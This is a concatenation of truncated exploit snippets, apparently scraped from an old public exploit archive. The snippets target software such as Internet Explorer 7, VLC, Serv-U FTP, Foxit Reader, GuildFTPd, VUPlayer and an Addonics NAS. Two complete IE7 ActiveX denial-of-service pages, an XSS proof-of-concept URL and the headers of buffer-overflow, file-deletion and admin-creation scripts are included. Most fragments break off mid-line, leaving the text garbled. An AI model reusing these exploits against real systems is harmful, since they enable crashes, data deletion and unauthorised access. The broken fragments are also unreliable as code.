BODY onload=document.designMode='on';//string alert('Design mode is on!'); document.removeChild(document.firstChild);//object; document.queryCommandState('BackColor'); alert('Close the Window to see the crash!');
/* rsmpf.c * Rosoft media player free local buffer overflow Exploit multi targets * Coded By : * SimO-s0fT (Maroc-anti-connexion@hotmail.com) * thanks To : Stack fl0 fl0w SKD * and special thanks to str0ke for his advices and support ( you are the be
#!/usr/bin/perl ######################################################## ## VLC 0.9.8a Web UI Remote Stack Overflow (DoS) by TheLeader ## GreetZ: forums.hacking.org.il ## TiP oF TEh DaY: Rock on! =] ###################################################
#!/usr/bin/perl # Soft : FTP Serv-U # Version : v7.4.0.1 # # Denial of Service in Serv-u up to 7.4.0.1 (no crash) # Just the server is saturated, it stops responding. # # Author: Jonathan Salwan # Mail: submit [AT] shell-storm.org # Web: http://www.s
#!/usr/bin/perl # Soft : FTP Serv-U # Version : v7.4.0.1 # # A vulnerability is caused due to an input validation error when handling FTP MKD # requests. This can be exploited to escape the FTP root and create arbitrary directory on # the system via
HTML Morovia Barcode ActiveX Control 3.6.2 (MrvBarCd.dll) Insecure Method Exploitbr br Description There is Insecure Method in (Save) fonctionbr Download Product : http://download.morovia.com/demo/MrvBarCd_Demo_V3.4.0.0.msibr Found By : Cyber-Zonebr
#!/usr/bin/perl # # Title: JDKChat v1.5 Remote Integer Overflow PoC # # Summary: JDKChat is a simple C++ chat server for GNU/Linux systems. # Users can connect to it through a simple tcp client like telnet. # # WebSite : http://www.jdkoftinoff.com/ #
#!/usr/bin/perl # # Foxit Reader 3.0 (= Build 1301) PDF Buffer Overflow Exploit # ------------------------------------------------------------ # Exploit by SkD (skdrat@hotmail.com) # # A SEH overflow occurs in this vulnerability in the popular # Foxi
Author: Max Dietz Description: After logging in, the message displayed to the user is stored in a GET request, on which no sanitizing is done PoC: https://commerce35.pair.com/inres/notify/index.php?action=loginformp_status=scriptjavascript:alert(HELL
#!/usr/bin/perl # Exploit: GuildFTPd FTP Server Version 0.x.x Remote Delete Files # # More detail for the vulnerability = http://secunia.com/advisories/32218/ # # 2) A vulnerability is caused due to an input validation error when handling FTP DELE #
#!/usr/bin/perl -w use LWP::UserAgent; use HTML::Form; print _________________________________________________________n; print [+]=RoomPHPlanningn; print [+]=v1.xn; print [+]=Vul: Remote Create user with all permissions (admin)n; print [+]=Author
#!/usr/bin/perl # VUPlayer = 2.49 .cue Universal Buffer Overflow Exploit # By Stack # Big THnx to Simo-Soft # Reference # http://www.milw0rm.com/exploits/8138 (this exploit work just on Xp SP2) # Other exploit # http://www.milw0rm.com/related.php?pro
html head titleInternet Explorer 7 DoS Exploit (C) 2009 MustLive. http://websecurity.com.ua /title script function DoS() { var dos = new ActiveXObject('Forms.ComboBox.1'); dos.ListWidth = 0x7ffffffe; } /script /head body onload=DoS() /body /html
html head titleInternet Explorer 7 DoS Exploit (C) 2009 MustLive. http://websecurity.com.ua /title script function DoS() { var dos = new ActiveXObject('Forms.ListBox.1'); dos.ListWidth = 0x7ffffffe; } /script /head body onload=DoS() /body /html
#!/bin/bash####################################################### Addonics NAS Adapter Post-Auth DoS# Tested against R3282-1.33c LOADER32 1.15, and NASU2FW41 Loader 1.17# Coded by Mike Cyr, aka h00die# mcyr2 at csc dot_____________com# Notes: Any o